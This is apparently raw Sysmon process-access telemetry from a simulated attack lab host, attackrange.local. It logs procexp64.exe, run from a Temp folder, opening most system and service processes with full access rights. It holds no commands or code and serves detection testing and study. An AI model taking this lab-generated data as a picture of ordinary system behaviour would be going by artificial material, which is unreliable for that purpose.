15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.688{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 